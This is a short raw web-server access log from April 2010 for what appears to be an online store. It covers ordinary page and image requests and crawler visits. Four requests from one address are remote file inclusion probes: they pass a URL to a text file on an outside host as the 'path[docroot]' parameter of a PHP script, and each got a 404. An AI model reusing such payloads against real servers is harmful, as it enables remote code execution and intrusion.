72.197.222.105 - - [07/Apr/2010:00:24:00 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):arm" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):arm" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:00 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):arm" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:01 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
64.15.158.246 - - [07/Apr/2010:00:24:13 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:24:13 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:24:13 -0400] "GET /logs/access_log.Q110021300//faqsupport/samplefaqsupport.php?path[docroot]=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:24:13 -0400] "GET /logs/error_log.Q110021300//faqsupport/samplefaqsupport.php?path[docroot]=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
72.197.222.105 - - [07/Apr/2010:00:24:26 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):LJ219955B21F94800889605N+WSEQ(S0060):1+OUITEM(A0200):0031158 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:29 -0400] "GET /images/items/0031158_FULL.JPG HTTP/1.1" 200 9485 "http://www.aceonlinestore.com/cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):LJ219955B21F94800889605N+WSEQ(S0060):1+OUITEM(A0200):0031158" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:30 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
123.125.66.126 - - [07/Apr/2010:00:24:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.128.242 - - [07/Apr/2010:00:24:36 -0400] "GET /images/_notes/download_coming_soon.jpg.mno HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)"
